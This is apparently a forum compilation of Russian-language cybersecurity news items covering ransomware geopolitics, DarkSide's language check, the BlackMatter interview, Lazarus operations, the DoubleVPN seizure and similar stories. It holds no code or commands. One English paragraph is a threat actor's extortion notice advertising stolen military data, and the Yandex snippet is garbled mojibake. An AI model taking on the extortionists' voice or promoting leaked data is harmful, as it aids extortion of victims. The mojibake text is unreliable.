В документе говорится, что участники саммита планируют расширить полномочия их национальных органов власти, позволив им дополнительные возможности регулирования рынка виртуальных финансовых активов. Некоторые страны уже предприняли подобные действия — ещё перед собранием в Белом Доме Австралия объявила о новой политике в отношении программ-вымогателей, в соответствии с которой она пообещала внести правки в свой уголовный кодекс.
Среди других пунктов совместного заявления — планы на дипломатический обмен информацией в сфере противодействия вымогателям и совместную работу по устранению безопасных убежищ для злоумышленников, которые за ними стоят.
В саммите участвовали представители Австралии, Бразилии, Болгарии, Канады, Чехии, Доминиканской Республики, Эстонии, Европейского союза, Франции, Германии, Индии, Ирландии, Израиля, Италии, Японии, Кении, Литвы, Мексики, Нидерландов, Новой Зеландии, Нигерии, Польши, Республики Корея, Румынии, Сингапура, ЮАР, Швеции, Швейцарии, Украины, ОАЭ, Великобритании и США. Россию и Китай на этот форум не пригласили.
source: habr.com/ru/news/t/583664/
Отношения между властями и вымогательской экосистемой основаны на устных и негласных соглашениях.
Хотя российское правительство не контролирует напрямую вымогательские группировки, находящиеся на территории страны, между властями и вымогательской экосистемой существуют «симбиотические отношения», побуждающие правительство закрывать глаза на вымогательские атаки, происходящие за рубежом, говорится в новом отчете ИБ-компании Recorded Future.
По словам экспертов, отношения между двумя сторонами основаны на устных и негласных соглашениях, а также «гибких связях». Президент РФ Владимир Путин неоднократно отрицал наличие таких связей, однако эффективная система наблюдения российских властей позволяет получить представление об операциях вымогательских группировок на территории РФ. Кроме того, они могут получить контроль над используемыми группировками ресурсами, в том числе локальными серверами, хостингом и прочей инфраструктурой, отметили специалисты.
«Молчаливое согласие происходит, когда российская хакерская экосистема действует независимо от указаний правительства. Этот род деятельности и его время совпадают со стратегическими целями российских властей, хотя в рамках этих усилий нет прямой или непрямой связи. Молчаливое согласие выражается в отсутствии уголовного преследования лиц, совершающих атаки, со стороны российского правительства до тех пор, пока они атакуют «правильные» объекты и не вредят интересам Кремля», - отмечается в отчете.
По словам специалистов, российское правительство оказалось под давлением на международном уровне после громких атак на компании Colonial Pipeline , JBS и Kaseya , осуществленных русскоязычными вымогательскими группировками REvil и DarkSide ранее в этом году. В августе президент США Джо Байден заявил , что РФ знает, кто стоит за хакерскими атаками, во время которых применялись вирусы- вымогатели.
«Широко известно, что группы, стоящие за этими атаками базируются в России; отсутствие действий со стороны российского правительства только подтверждает очевидную причастность Кремля. Давление уже повлекло заявления, указывающие на потенциальные изменения в операциях вымогательских групп, например, недавнее заявление группировки BlackMatter о том, что она не будет атаковать критическую инфраструктуру», - говорят специалисты Recorded Future.
Source: go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf
Они после стольких лет, только сейчас додумались до установки русской раскладки!? Тратить миллионы могли на систему безопасности, а привиться не могли таким простым методом =) Я бы с удовольствием посмотрел на тех кто останется без наживы, из-за навязанных правил нелепых (отказа работы по РУ) которые много лет практикуют русскоязычные группы.
Многие вредоносные программы проверяют наличие на атакуемой системе наличие
кириллицы и в случае ее обнаружения не устанавливается.
После нашумевшей кибератаки на американского топливного гиганта Colonial Pipeline, вызвавшей острый дефицит бензина на восточном побережье США, стоящая за ней киберпреступная группировка DarkSide поспешила откреститься от всяких политических мотивов. Согласно заявлению хакеров, они являются аполитичными и «не участвуют в геополитике». Однако, как утверждает журналист Брайан Кребс, заявление киберпреступников не соответствует действительности.
«Дело вот в чем: цифровые вымогательские группировки наподобие DarkSide очень пекутся о том, чтобы сделать всю свою платформу геополитической, потому что их вредоносное ПО специально разработано так, чтобы оно работало только в определенных частях мира», – пишет Кребс.
По словам журналиста, как и другие вымогательские программы, DarkSide содержит вшитый список стран, в которых он не заражает компьютерные системы. Как правило, в этот список входят страны бывшего СССР и страны СНГ. В частности, в список DarkSide входят: Азербайджан, Армения, Беларусь, Грузия, Казахстан, Киргизстан, Молдова, Россия, Румыния, Сирия, Туркменистан, Таджикистан, Татарстан, Украина и Узбекистан.
Перед установкой на систему вредонос проверяет наличие на ней языка страны из списка и в случае его обнаружения, не устанавливается.
«Как известно, киберпреступники, быстро реагируют на средства защиты, снижающие их прибыльность, так почему бы плохим парням просто не изменить ситуацию и не начать игнорировать проверку языка? Что ж, они, безусловно, могут и, возможно, даже будут это делать (последняя версия DarkSide, проанализированная Mandiant, не выполняет проверку языка системы)», – сообщил журналист.
Тем не менее, отказ от проверки языка увеличивает риск безопасности самих киберпреступников и уменьшения прибыли, пояснила главный исследователь нью- йоркской ИБ-компании Unit221B Эллисон Никсон (Allison Nixon).
По словам Никсон, из-за уникальной правовой культуры РФ российские киберпреступники используют проверку языка, чтобы быть уверенными в том, что их жертвы находятся за границей.
«Они делают это в целях правовой защиты. Установки кириллической клавиатуры или изменения определенной записи в реестре на «RU» и т. д. может быть достаточно для того, чтобы убедить вредоносное ПО в том, что вы русский. Технически это можно использовать в качестве «вакцины» против российского вредоносного ПО», – пояснила Никсон.
Значит ли это, что установка русской раскладки на сто процентов обезопасит систему от хакеров? Нет. В киберпреступном мире существует множество группировок, которым, в отличие от DarkSide, все равно, кого атаковать. Изменение языковых настроек не может заменить кибергигиену и лучшие практики кибербезопасности, подчеркивает Кребс. Тем не менее, эксперт не видит причин, почему бы не попробовать столь простой профилактический способ обезопасить себя.
«Худшее, что может случиться, – вы случайно переключите языковые настройки, и все ваши пункты меню будут на русском», – пишет Кребс.
Подробнее: https://www.securitylab.ru/news/520295.php
Защищенный и "анонимный" почтовый сервис Protonmail выдал IP логи "зеленых" радикальных активистов из движения Youth For Climate по запросу Европола
Служба Protonmail получила запрос от Европола через Швейцарские власти о необходимости предоставить логи IP адресов активистов Youth for Climate в Париже для их задержания. Разумеется, на запрос Швейцарских властей (Swiss Federal Department of Justice) Protonmail обязан реагировать незамедлительно. Распространённое мнение о его невероятной анонимности и конфиденциальности мягко скажем преувеличено в последние годы. Маркетинг жесток и беспощаден.
Privacy Policy Protonmail (https://protonmail.com/it/privacy-policy):
"By default, we do not keep permanent IP logs in relation with your use of the Services. However, IP logs may be kept temporarily to combat abuse and fraud, and your IP address may be retained permanently if you are engaged in activities that breach our terms and conditions, for example spamming, DDoS attacks"
"По умолчанию, мы не ведем логи IP-адресов. Однако логи IP-адресов могут храниться временно для борьбы со злоупотреблениями и мошенничеством, и ваш IP- адрес может быть сохранен навсегда, если вы занимаетесь деятельностью, которая нарушающей наши правила работы сервиса, например спам или DDoS"
Protonmail имеет техническую возможность хранить логи на постоянной основе и в случае необходимости даже прикрыться историей с подозрением на спам или DDoS cо стороны пользователей сервиса согласно Privacy Policy.
Вполне ожидаемо прокомментировал ситуацию Генеральный директор ProtonMail Энди
Йен (https://twitter.com/andyyen) в ответ на недовольства пользователей в
контексте обсуждения выдачи IP логов:
**" По Швейцарскому законодательству мы обязаны отвечать на запросы
швейцарских властей"_ **_- в частности речь идет о запросе со стороны Swiss
Federal Department of Justice
Троих сотрудников отдела наркоконтроля УВД по ЮЗАО Москвы обучат техникам «этичного хакинга» в рамках повышения квалификации.
Отделение по обороту за контролем наркотиков управления МВД по ЮЗАО Москвы
выделит 838 тыс. рублей для обучения троих сотрудников «этичному хакингу». Об
этом говорится на портале госзакупок, внимание на документ обратило агентство
«Москва».
По плану, полицейские научатся защищать информацию от «несанкционированного
доступа» и узнают «техники этичного хакинга». Среди заявленных тем обучения —
основы сетей и сетевых операционных систем, теория социальной инженерии,
перехват интернет-сеансов и хакинг. В конце курса по изученным темам пройдут
практические занятия.
В заявке говорится, что курс должен способствовать раскрываемости преступлений
по наркотическим статьям, которые совершают в интернете. Окончание курса
запланировано на 31 декабря 2021 года.
Киевлянин, который с 2016 года начал вкладывать деньги в криптовалюту, обратился в правоохранительные органы с заявлением о том, что стал жертвой мошенников, похитивших у него денежные средства на сумму, эквивалентную более чем 600 тысяч долларов.
Являясь участником тематических интернет-ресурсов, он познакомился и время от времени прибегал к консультациям неких «экспертов» в области криптовалюты. Летом нынешнего года, потерпевший решил сформировать определенный инвестиционный портфель из криптовалюты, для чего и обратился за помощью к «экспертам».
Общаясь через Телеграм, «эксперты» предложили инвестору услуги обмена криптовалюты на выгодных условиях, обосновав это заинтересованностью в долгосрочном сотрудничестве. Чтобы клиент убедился в качестве оказываемых услуг, ему предложили совершить тестовую операцию на небольшую сумму денег (100 долларов), которая прошла успешно.
Для осуществления данной операции, инвестор передавал наличные деньги своей знакомой, которая заводила их на свой кошелек и отправляла менялам. Убедившись, что все работает как надо, инвестор передал знакомой значительно более крупную сумму денег (17 158 145,00 грн) и попросил перевести на кошелек «экспертов», чтобы обменять на несколько видов перспективной криптовалюты.
Однако результат оказался для него неожиданным: криптовалютные «эксперты» заявили, что не получили никаких денег и где сейчас находятся деньги инвестора – не имеют ни малейшего представления. При том, они потерли историю переписки в Телеграм, и отказались предоставлять какие-либо подтверждения того, что на их кошельке указанная сумма денег отсутствует. В то же время, факт проведения этих денег и их зачисления на кошелек мошенников подтверждается данными о транзакциях сайта etherscan.io.
В ходе досудебного расследования, специалисты из Департамента контрразведывательной защиты интересов Государства в сфере информационной безопасности СБУ, установили, что с 2016 года в Украине действует группа лиц, которая использует информационные ресурсы в сети интернет для сбора данных о гражданах, владеющих большими суммами криптовалюты. Основная задача мошенников – хищение этих средств, следовательно, жертв может оказаться гораздо больше, чем один потерпевший.
В настоящий момент правоохранители добились постановления суда об аресте криптовалютного кошелька USDT (Tether), принадлежащего подозреваемым, на счету которого находятся средства в количестве 631,500 USDT.
Также, продолжается работа над тем, чтобы установить личности причастных мошенников, которых подозревают в нарушении ч.3 ст.190 УК – мошенничество в особо крупных размерах, с использованием электронно-вычислительной техники. Санкции данной статьи предусматривают наказание сроком от 3 до 8 лет.
There are a few articles about but in reality we got a bit more data, about 80Gb. Right now we are negotiating with the company and they seem to not really care about the data, so we decided to take the matter into our own hand, tomorrow we'll publish 5Gb and see if they care
After a small analysis we figured that data included some interesting files: military contracts personal data and the most fun of all - the blueprints for American military planes. The company stated they not gonna do anything about leak, so pretty soon you'll be able to download the files.
Also, recently we published 15Gb of data from Newbridge Securities, you can download at any time
После того, как в прошлом месяце печально известная кибервымогательская группировка DarkSide свернула свои операции, появилась новая группировка BlackMatter, заявившая что является приемником DarkSide и REvil. Группировка опубликовала на хакерских форумах объявления о поиске партнеров и готовности заплатить $100 тыс. за доступ ко взломанным сетям компаний, чей готовой доход составляет не менее $100 млн. Теперь же BlackMatter дала первое интервью, в котором рассказала о своем вымогательском ПО и планах на будущее. Беседа с аналитиком ИБ-компании Recorded Future Дмитрием Смелянцом велась на русском языке.
По словам представителя BlackMatter, группировка работала над созданием одноименного вымогательского ПО в течение шести месяцев. Перед тем, как приступить к разработке проекта, она подробно изучила вымогательские программы LockBit, REvil и DarkSide и взяла от них самое лучшее.
В LockBit разработчики оценили хорошую кодовую базу, но остались недовольны неудобной панелью.
«Если сравнивать с автомобилем, то это как японская машина с хорошим двигателем, но пустым и нефункциональным салоном. Ездить можно, но удовольствия мало», – сообщил представитель BlackMatter.
Вымогательская программа REvil хороша во всем – проверенное временем ПО, которое мало изменилось со времен GandCrab, и функциональная панель. Однако в ней «больше внимания уделялось общему количеству успешных «загрузок», а не конкретной целевой криптографии».
В DarkSide разработчикам приглянулась хорошая кодовая база со стоящими внимания новыми идеями и «более интересной web-частью, чем у других RaaS».
Как пояснил собеседник Смелянца, исполняемая часть вымогательского ПО BlackMatter основывается на идеях LockBit, REvil и частично DarkSide. Web- компонент программы базируется на web-компоненте DarkSide, поскольку разработчики сочли ее «наиболее корректной с точки зрения структуры» (отдельные компании для каждой мишени и т.п.).
На сайте утечек BlackMatter пока не указаны никакие жертвы, но это не значит, что их нет. Группировка уже успела атаковать несколько компаний и в настоящее время ведет с ними переговоры об уплате выкупа. Пока ведутся переговоры, информация о жертвах на сайте не публикуется.
На вопрос, является ли BlackMatter новым названием все той же DarkSide (операции двух группировок имеют очень много общего ), собеседник Смелянца ответил, что группировка восхищается работой своих коллег из DarkSide и знакома с ней не понаслышке – раньше они работали вместе.
«Но мы – не они, хотя нам и близки их идеи», – уверил собеседник.
Группировка планирует постоянно совершенствовать свой продукт, добавляя в него новые возможности, и в настоящее время набирает команду. BlackMatter интересуют только опытные тестировщики на проникновение со своими «собственными решениями и стремлением зарабатывать», а все скрипт-кидди будут отсеиваться.
Представитель BlackMatter сообщил, что недавний уход с кибервымогательской арены таких крупных игроков, как DarkSide, REvil, Avaddon и BABUK во многом связан с геополитической ситуацией в мире.
«Прежде всего, это страх перед США и их намерением провести наступательные кибероперации, а также двойственная природа кибервымогательства. Мы следим за политической ситуацией и получаем сведения от других источников. Мы разрабатывали нашу инфраструктуру с учетом всех этих факторов и можем с уверенностью сказать, что способны противостоять наступательным кибервозможностям США», – заявил представитель BlackMatter.
Как долго продержится группировка, покажет время, но BlackMatter нацелена на долгосрочные операции. Тщательна модерация жертв (атаки на критическую инфраструктуру и нефтегазовую промышленность в BlackMatter запрещены) поможет ей избежать нежелательного внимания со стороны властей.
«Мы создали проект и вывели его на рынок точно в то время, когда ниша освободилась, и этот проект полностью удовлетворяет всем требованиям рынка, а значит, успех неизбежен», – заявили в BlackMatter.
От Смелого тут: [https://therecord.media/an-intervie...ning-from-the-mistakes-of- darkside-and-revil/](https://therecord.media/an-interview-with-blackmatter-a- new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/)
Неизвестные хакеры оставили в профилях 1800 пользователей на Roblox.com сообщение: «Попроси своих родителей голосовать за Трампа в этом году! #MAGA2020». Судя по жалобам пострадавших, которые можно обнаружить на Reddit, в Twitter и так далее, первые атак начались еще на прошлой неделе.

Но текстовым сообщением в поддержку Трампа дело не ограничилось: аватары взломанных аккаунтов тоже были изменены и теперь демонстрируют одежду, типичную для сторонников Дональда Трампа: красная кепка и футболка с американским флагом и белоголовым орланом.
Многие пострадавшие, которые сообщили о взломе своих учетных записей на форумах Roblox, признались, что повторно использовали один и те же пароли или имели очень простые учетные данные, неустойчивые даже перед простым перебором. Также многие признаются, что не включали двухфакторную аутентификацию. Roblox использует систему 2ФА на основе электронной почты, она требует, чтобы пользователь сначала ввел логин и пароль, а затем одноразовый код, который отправляется на указанную им почту.
В настоящее время неясно, каким образом хакеры сумели скомпрометировать такое количество аккаунтов, а представители Roblox не комментируют ситуацию. Впрочем, специалисты ИБ-компании KE-LA сообщили изданию ZDNet, что им удалось обнаружить на paste-сайтах списки имен пользователей Roblox с паролями открытым текстом. Журналисты проверили десятки пользователей из этих списков и обнаружили, что многие из них действительно пострадали от рук хакеров, призывающих голосовать за Трампа. Издание предполагает, что именно так было взломано большинство учетных записей.

При этом атаки до сих пор продолжаются. Когда исследователи только начал изучать проблему в минувшие выходные, они насчитали около 750 взломанных профилей. В течение недели их число почти не менялось, остановившись на отметке примерно 1000 взломанных учетных записей, но теперь количество скомпрометированных аккаунтов снова растет. Так, всего за час хакеры увеличили количество взломов с 1680 до 1820.
Так как среди пользователей Roblox очень много детей, эксперты рекомендуют их родителям помогать своим чадам, выбирать более надежные пароли и включать 2ФА.
Источник: xakep.ru/2020/07/03/pro-trump-hack/
Украинские правоохранители ликвидировали масштабную операцию по добыче
цифровой валюты. Полицейские изъяли 5 тыс. компьютеров и 3800 игровых
консолей, участвовавших в этой операции — это крупнейшая на данный момент
криптомайнинговая кампания, выявленная в стране.
Злоумышленники базировались в городе Винница, умудряясь каждый месяц воровать электроэнергию на сумму 259 300 долларов. Чтобы как-то скрыть эту активность, преступники использовали липовые показатели счётчиков электроэнергии, не отражающие реального потребления.
«Деятельность злоумышленников могла привести к скачкам напряжения и оставить население без электроэнергии», — пишет Служба безопасности Украины (СБУ). Также правоохранители отметили, что уголовное дело возбудили по факту кражи воды, электроэнергии и тепловой энергии. Операцию криптомайнинга организовали жители Киева и Винницы, которая находится в трёх часах езды от столицы.
Следователи опубликовали снимки, на которых видна огромная производственная комната, уставленная от стены до стены конструкцией из стальных стеллажей, в которых хранились компьютеры и игровые приставки PlayStation.
Source: https://www.anti-malware.ru/news/2021-07-12-111332/36378
Пять лет назад около сотни человек по всей Японии пришли к пяти утра в магазины круглосуточной сети 7-Eleven. Их интересовали не продукты, а банкоматы, установленные в торговых точках. На руках у них были белые пластиковые карточки — без имени, цифр и чипа, только магнитная полоса. Каждый из сотни должен был с помощью переданного ему ПИН-кода и карты снять за раз 100 тыс. иен — около $900. Эту операцию можно было повторять не более 20 раз в одном банкомате, после восьми утра следовало остановиться и вернуться к своим координаторам, а тем — передать все снятые деньги за вычетом вознаграждения в размере 10%.
Всего тем утром в Токио и еще 16 префектурах Японии по белым пластиковым картам было проведено около 14 тыс. операций снятия наличных. Таким образом из банкоматов выкачали почти $13 млн, которые принадлежали полутора тысячам клиентов одного южноафриканского банка. Расследование указывает на то, что украденные деньги в дальнейшем через боссов местной якудзы были перенаправлены в Северную Корею, хакеры которой и руководили всей спецоперацией.
Трудности перевода
Иностранцам крайне сложно понять, что происходит в Северной Корее. Но самим гражданам этого государства еще труднее узнать о том, как устроен внешний мир. По ночам это черная дыра на спутниковых снимках Земли. Восточная Азия ночью полыхает электрическим огнем, а между 38-й и 43-й параллелями разлилось чернильное пятно, на котором одинокой точкой горит Пхеньян — столица КНДР.
В этой стране в интернет можно выйти только по специальному разрешению и чаще всего в государственных целях. Вместе с тем существует внутренний северокорейский интранет, к которому имеет доступ чуть большее, но по-прежнему ничтожно малое число граждан.
Как бы ни парадоксально это выглядело на фоне всего упомянутого выше, но власти Северной Кореи подготовили одних из самых опытных хакеров в мире. Да, звучит это странно и комично — как если бы сборная Египта выиграла олимпийское золото в бобслее. Однако угроза от северокорейских хакеров — это факт, который подтверждается десятками их успешных операций — от кражи 200 ГБ военных документов у Южной Кореи до масштабных атак на криптобиржи.
Кузницы кадров
Возможно, в Северной Корее совсем немного финансовых или технологических ресурсов, однако в человеческом ресурсе государство недостатка не испытывает. В главном политехе страны, который носит имя военного деятеля Ким Чхэка, учится около 10 тыс. студентов, а сам университет попадает в авторитетные рейтинги лучших вузов. Например, в 2019 году его представители завоевали серебро на международной студенческой олимпиаде по программированию, уступив первую ступеньку МГУ, Массачусетскому технологическому институту, университетам Токио и Варшавы.
Этот северокорейский политех и Университет Ким Ир Сена на пару собирают под своей крышей самых талантливых подростков. Некоторых из них в будущем ждет работа — служба по развитию киберпрограммы страны в управлении генерального штаба или главном разведывательном бюро. Последнее эксперты и называют основным исполнителем криминальных заказов северокорейского правительства.
Там есть множество подразделений, между которыми распределена ответственность за различные кибероперации.
Связь между бывшими студентами и нынешними хакерами обнаруживается иногда в совершенно удивительных местах. Время от времени кодеры подписывают свои скрипты — это такая форма хвастовства, которая существует в хакерской среде. Южнокорейский эксперт по безопасности Саймон Чои обнаружил в коде одной из зловредных программ тег kut_rsc1994. В нем он распознал одного из участников международной математической олимпиады. KUT — это сокращение от Kim Chaek University of Technology, еще три буквы — инициалы Рю Сон Чоля, который взял серебро в Амстердаме в 2011-м, а 1994-й — год его рождения.
Эксперты по Северной Корее полагают, что хакерские группировки начали создаваться в стране еще при Ким Чен Ире, отце нынешнего вождя Ким Чен Ына. Это были армейские формирования, которые должны были шпионить на благо режима. Ким Чен Ын, как более молодой и продвинутый лидер, которого не раз замечали рядом с компьютерами Mac, вероятно, расценивает информационные технологии как еще более важное звено в обеспечении режима и противостоянии капиталистам.
Сейчас считается, что в северокорейской киберпрограмме в той или иной степени задействовано около 7 тыс. человек. Часть из них — активные хакерские ячейки — ведут свою деятельность с территории Китая и Юго-Восточной Азии. Американские аналитики проследили цифровые отпечатки одной из подобных ячеек. Они ведут в приграничный китайский город Даньдун.
Много интересного рассказывают беженцы из Северной Кореи. Один такой работал в правительственной торговой компании в Китае, а в 2014 году бежал в США. По его утверждениям, в Даляне действовали три группы северокорейских IT-специалистов. Другой рассказывал, что самые высококлассные хакеры остаются в Пхеньяне и действуют через VPN-сервера. А за наиболее успешные операции они получают специальные подарки от Ким Чен Ына — дома и автомобили.
Атака на центробанк
Одной из таких операций считается атака на Центральный банк Бангладеш. В начале 2015 года сотрудникам этого учреждения по электронной почте начали поступать фишинговые сообщения. Трое из них по неаккуратности вместе с письмом загрузили на компьютеры и зараженное вложение. С его помощью к марту хакеры из группировки Lazarus (так называют одну из ячеек северокорейских киберпреступников) установили «бэкдор» в электронной системе связи Центробанка Бангладеш. Этот черный ход позволил им проанализировать и научиться отправлять сообщения, которые имитируют протоколы зашифрованной связи. Десять месяцев хакеры изучали банковские процессы, прежде чем приступить к активной фазе своей операции.
У Центробанка Бангладеш есть счет в иностранной валюте в Федеральной резервной системе в Нью-Йорке, где хранится часть государственных сбережений. 4 февраля 2016-го, спустя почти год после того, как хакеры установили свой «бэкдор», из Бангладеш в Нью-Йорк стали поступать инструкции по десяткам переводов на различные счета на общую сумму около $1 млрд. Хакеры отправляли эти запросы, используя предварительно собранные логины и пароли сотрудников банка. Чтобы не «спалиться», в запросах было много деталей, подсмотренных в транзакциях, которые ранее осуществлял банк. А перед этим на сеть еще и накатили обновление, которое скрывало фиктивные запросы от сотрудников Центробанка Бангладеш.
Эксперты по кибербезопасности называли эту операцию практически идеальной. Группировка Lazarus долгие месяцы вела подготовительную работу, чтобы в один день украсть $1 млрд и замести следы. Частичный провал случился лишь по чистой случайности. Первые пять платежей на общую сумму $100 млн прошли гладко, а вот следующие 30 еще на $850 млн застопорились. Когда в тексте запроса проскользнуло слово «Юпитер», сработала автоматическая система блокировки. Название планеты было в адресе одного филиппинского банка, куда следовало перевести деньги. Однако этот же «Юпитер» фигурировал и в названии греческого предприятия, связанного с обходом иранских санкций.
Тем не менее хакерам удалось вывести украденные $81 млн через филиппинские песо и обмен фишек в местных казино.
Группировка Lazarus
У группы Lazarus много альтернативных имен, которыми их окрестили различные фирмы и эксперты по кибербезопасности. Но точные данные о них практически отсутствуют, что, в принципе, неудивительно, так как, согласно данным ФБР, эти ребята работают под патронажем Северной Кореи. Однако участникам этой хакерской группы приписывают авторство многих громких кибератак.
Атака на Бангладеш была одной из самых громких и прибыльных. Истерия чуть громче развернулась на Западе, когда была взломана кинокомпания Sony Pictures. Студия снимала комедию «Интервью» с Сетом Рогеном и Джеймсом Франко о журналистах, которых ЦРУ завербовало для убийства Ким Чен Ына. Северная Корея летом 2014-го назвала фильм «террористическим актом» и пообещала дать «беспощадный ответ».
Уже в ноябре того же года сотрудники Sony сообщили, что их компьютеры были взломаны хакерами, которые называли себя «Стражами мира». Дошло до того, что Sony попросту обесточила свои серверы и всю внутреннюю сеть, но было уже поздно. В руки хакеров попали внутренние письма, данные по зарплатам, сценарии и фильмы кинокомпании. В интернет выложили пять еще не вышедших фильмов и сценарий будущей части бондианы — «Спектр». Это был болезненный удар по репутации компании, что повлекло значительные убытки от недополученной прибыли и устранения последствий атаки.
Наиболее значительный ущерб от действий, как предполагается, той же группировки Lazarus был причинен зловредной программой WannaCry в 2017 году. Попадая на компьютер жертвы, она полностью блокировала работу Windows, шифровала все файлы и требовала выкуп в размере $300 в биткоинах. Заплатить надо было в течение трех дней. Затем сумма удваивалась. Если спустя неделю средства не поступали, все данные уже не подлежали восстановлению.
Под раздачу попали как обычные домашние компьютеры, так и корпоративные, а также больничные. В общей сложности пострадало несколько сотен тысяч компьютеров, а ущерб компаниям по всему миру, по самым смелым оценкам, составил около $4 млрд.
Для Ким Чен Ына хакеры — это не только приятные денежные бонусы, но и оружие шпионажа, цифрового саботажа. Этой зимой хакеры, имеющие отношение к Северной Корее, попытались атаковать фармацевтическую компанию Pfizer. Как предполагается, сделали они это для того, чтобы украсть технологии, связанные с разработкой вакцины от коронавируса. Была ли эта попытка успешной, не сообщается. Однако в Северной Корее, в отличие от всего мира, еще не было официально зарегистрировано ни одного случая коронавирусной инфекции. Также официально отрицаются и любые обвинения западной пропаганды в причастности руководства страны к деятельности хакеров.
Мы по-прежнему не знаем точно, как живут и работают хакеры из Северной Кореи. Одно известно доподлинно: там много талантливых людей, чьи способности используются по большей части для ведения непримиримой цифровой войны со всем остальным миром. Периодически голодающая, изолированная от мира, но все такая же воинственная КНДР предпочитает все превращать в армию. И демонстрирует в этом определенные успехи.
**Copilot — новый проект нейросетевого помощника, призванный помогать программистам писать код. Это проприетарная технология была создана OpenAI и распространяется как плагин Visual Studio Code
GitHub признался, что при обучении помощника Copilot разработчики использовали
весь доступный в репозиториях сервиса публичный код без учёта типа лицензии.
Фактически программные наработки, полученные с помощью «Copilot» нарушают
многие свободные лицензии, в том числе лицензию GPL,
Сторонние разработчики и пользователи возмущены такими действиями Microsoft и
GitHub, и обвинили корпорации в неуважении прав на код частных лиц и небольших
общественных проектов.
Активисты уже начали объединять вокруг себя людей, в том числе юристов Фонда
свободного программного обеспечения и Фонда электронных рубежей. Совместно они
намерены подать коллективный иск против корпораций зла.
С другой стороны сейчас нет такого закона, где ИИ запрещалось бы нарушать авторские права
Позиция GitHub по этому вопросу: «обучение моделей машинного обучения на общедоступных данных считается добросовестным использованием в сообществе разработчиков ИИ»
Новость взята с телеграмм канала "Чёрный Треугольник"**
Киберпреступники используют DoubleVPN для обфускации своего местоположения и IP-адресов во время осуществления кибератак.
Сотрудники правоохранительных органов изъяли серверы и файлы журналов сервиса двойного шифрования DoubleVPN, часто использующегося киберпреступниками для обхода обнаружения.
DoubleVPN является российским VPN-сервисом, который осуществляет двойное шифрование проходящих через него данных. Во время использования сервиса запросы шифруются и передаются одному VPN-серверу, который затем передает их другому VPN-серверу, а тот подключается уже к конечному пункту назначения. Киберпреступники используют DoubleVPN для обфускации своего местоположения и IP-адресов во время осуществления кибератак.
Во вторник, 29 июня, правоохранители арестовали сайт doublevpn.com. По их словам, им удалось получить доступ к серверам DoubleVPN, персональной информации пользователей сервиса, файлам журнала и статистическим данным.
«Международные правоохранительные органы продолжают совместную борьбу против пособников киберпреступлений, независимо от того, когда и как они совершаются. Расследование в отношении данных пользователей этой сети продолжается», - сообщается в уведомлении правоохранительных органов, опубликованном на сайте doublevpn.com.
В правоохранительной операции принимали участие Европол, Евроюст, ФБР, Национальное управление по борьбе с преступностью Великобритании, Секретная служба США, Королевская конная полиция Канады, а также правоохранительные органы Германии, Нидерландов, Швеции, Швейцарии и Болгарии.
Скриншоты новой операционной системы Microsoft Windows 11 появились на
китайском сайте Baidu, они демонстрируют новый пользовательский интерфейс
Windows 11 и меню «Пуск». Высказываются мнения, что Windows 11 напоминает
Windows 10X, которая в итоге была отменена.
Значки приложений теперь расположены по центру панели задач с новой кнопкой
«Пуск» и меню. Меню «Пуск» - это упрощенная версия того, что в настоящее время
существует в Windows 10, без живых плиток. Оно включает закрепленные
приложения и возможность быстро выключать или перезапускать устройства под
управлением Windows 11. Операционная система обозначена на скриншоте как
Windows 11 Pro.
Мы видим сборку Windows 11 Pro 21996.1, при этом немного смущает дата
установки: 16 июня 2021 года. Да, в Пекине уже первый час ночи (на момент
публикации заметки), но скриншоты появились раньше. Впрочем, The Verge
подтверждает, что скриншоты являются подлинными
Ожидается, что Microsoft использует большую часть наработок по Windows 10X в
Windows 11. Операционная система Windows 10X изначально была разработана для
устройств с двумя экранами, но затем была заявлена и для обычных компьютеров,
но в итоге её отменили.
Microsoft [подтвердила](https://www.ixbt.com/news/2021/06/12/microsoft-
windows-11.html), что готова к запуску Windows 11. 24 июня софтверный гигант
проведёт специальное мероприятие по Windows, чтобы представить свою следующую
операционную систему.
Российский технологический гигант Яндекс заявил, что поймал сотрудника, продающего доступ к почтовым ящикам пользователей
-Яндекс сказал, что этот сотрудник был одним из трех администраторов техподдержки
-Компания говорит, что сотрудник продал доступ к 4887 почтовым ящикам
Пресс релиз от yandex:

внÑÑÑенней ÑÑеÑки ](https://yandex.ru/company/press_releases/2021/2021-02-12)
Ð Ñоде ÑегÑлÑÑной пÑовеÑки ÑлÑжбой безопаÑноÑÑи ЯндекÑа бÑл ÑаÑкÑÑÑ ÑÐ°ÐºÑ Ð²Ð½ÑÑÑенней ÑÑеÑки. Ðо вÑÐµÐ¼Ñ Ð²Ð½ÑÑÑеннего ÑаÑÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ Ð±Ñло обнаÑÑжено, ÑÑо ÑоÑÑÑдник пÑедоÑÑавлÑл...
 yandex.ru
Власти Великобритании намерены возглавить мировую борьбу против киберпреступников, занимающихся вымогательством, и готовы начать вводить персональные санкции в отношении хакеров.
Об этом в пятницу в интервью газете The Daily Telegraph заявил глава МИД Соединенного Королевства Доминик Рааб.
По его словам, Лондон рассмотрит возможность расширить свои черные списки, включив в них хакеров-вымогателей, в первую очередь из России, но также оставляет за собой право применять “более наступательные средства борьбы” со злоумышленниками.
“Мы заставим заплатить тех, кто систематически совершает кибератаки ради прибыли, в целях шпионажа или просто для нанесения ущерба и создания хаоса”, – указал глава британского МИД.
При этом в качестве конкретных ограничительных мер, которые может ввести Великобритания в отношении киберпреступников, называется заморозка их банковских счетов и запрет на въезд в страну.
Рааб отметил, что Соединенное Королевство вместе с правительством США “возглавит мировые усилия” по борьбе с кибератаками с применением вирусов- вымогателей, которые парализуют работу объектов национальной инфраструктуры.
Согласно информации The Daily Telegraph, американский президент Джо Байден и премьер-министр Великобритании Борис Джонсон планируют включить пункт об укреплении сотрудничества в сфере кибербезопасности в итоговое коммюнике стран Группы семи (G7), лидеры которых соберутся в предстоящий уик-энд в городе Карбис-Бэй в английском графстве Корнуолл. Кроме того, британские власти планируют вынести эту тему на обсуждение в ООН и на саммите Группы двадцати в октябре в Риме.
Глава британского МИД также подчеркнул, что Лондон намерен активнее помогать союзникам в вопросе защиты их предприятий и учреждений от кибератак.
